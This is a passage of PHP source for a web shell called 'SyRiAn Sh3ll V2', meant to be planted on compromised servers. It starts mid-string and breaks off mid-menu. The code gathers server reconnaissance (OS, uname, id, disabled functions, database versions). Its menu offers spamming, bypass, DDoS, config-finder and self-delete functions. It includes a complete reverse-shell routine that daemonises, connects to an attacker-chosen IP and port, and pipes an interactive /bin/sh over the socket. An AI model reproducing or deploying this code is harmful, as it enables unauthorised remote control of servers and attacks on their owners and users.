'; exit; } } } # ---------------------------------------# # Operating System # #----------------------------------------# $os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "Linux"; # ---------------------------------------# # Server Dir # #----------------------------------------# if(empty($dir)) { $opsy = getenv('OS'); if(empty($opsy)) { $opsy = php_uname(); } if(empty($opsy)) { $opsy ="-"; $os = "Linux"; } else { if(eregi("^Windows",$opsy)) { $os = "Windows"; } else { $os = "Linux"; } } } if($os == "Linux") { $pwd = @Exe("pwd"); } elseif($os == "Windows") { $pwd = @Exe("cd");} if(empty($pwd)) { $pwd = getcwd(); } # ---------------------------------------# # Header # #----------------------------------------# $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); $server = @substr($SERVER_SOFTWARE,0,120); echo "

  

 
SyRiAn Sh3ll
V2

  [Main] [Scripts Hacking] [Spamming] [Bypass] [About] [Logout] [SuiCide]

  Safe Mode = ".@SafeMode()."   System = ".$os."   Magic_Quotes = ". @magicQouts()."   Curl = ".@Curl()."   Register Globals = ".@RegisterGlobals()."   Open Basedir = ".@openBaseDir()."
  Gzip = ".@Gzip()."   MySQLI = ".@MysqlI()."   MSQL = ".@MSQL()."   SQL Lite = ".@SQlLite()."   Usefull Locals = ".rootxpL()."
  Free Space = ".@HardSize(disk_free_space('/'))."   Total Space = ".@HardSize(disk_total_space("/"))."   PHP Version = ".@phpversion()."   Zend Version = ".@zend_version()."   MySQL Version = ".@mysql_get_server_info()."
  MySQL = ".MySQL2()."   MsSQL = ".MsSQL()."   PostgreSQL = ".PostgreSQL()."   Oracle = ".Oracle()."   Server Name = ".$_SERVER['HTTP_HOST']."   Server Admin = ".$_SERVER['SERVER_ADMIN']."
  Dis_Functions = ". DisableFunctions()."
  Your IP = ". GetRealIP()."   Server IP = ".gethostbyname($_SERVER["HTTP_HOST"])." [Bing Search] [Reverse IP]   Date Time = ".date('Y-m-d H:i:s')."

  Server :  
uname -a :  
pwd :  
ID :  

  ".$server."
  ".$uname." [Google]
  ".$dir."
  ".Exe('id')."

  [Down] [Print]

"; # ---------------------------------------# # SuiCide # #----------------------------------------# if($_GET['id'] == 100) { echo ""; } if($_GET['id'] == 'Delete') { Suicide(); } # ---------------------------------------# # Main Page # #----------------------------------------# if ($_GET['id']== 'mainPage' ) { echo "
"; if($_POST['editFileSubmit']) { echo " "; echo ""; } echo "
  Commands Alias
";SelectCommand($os); echo "
  Command Line
  Change Directory
  Edit File
  Get File
  Server ShortCut
  CGI Perl
  Change Mode

  Back Connection

"; if($_POST['backConnectionSubmit']) { $ip = $_POST['yourip']; $port = $_POST['yourport']; @set_time_limit (0); $VERSION = "1.0"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("[-] ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("[-] Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("[-] WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("[-] Error Can't Connect !! "); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("[+] Connected Successfully With $ip:$port"); printit("[+] SyRiAn Sh3ll V2"); while (1) { if (feof($sock)) { printit("[-] ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("[-] ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } } echo "
  Hash Analyzer
  Eval Code
  Users & Domains
  Reading Files
  Encryption
  Metasploit Connection
  Show Users
  Ports Scanner
  ACP Finder
  DDOS Attacker
  Config Finder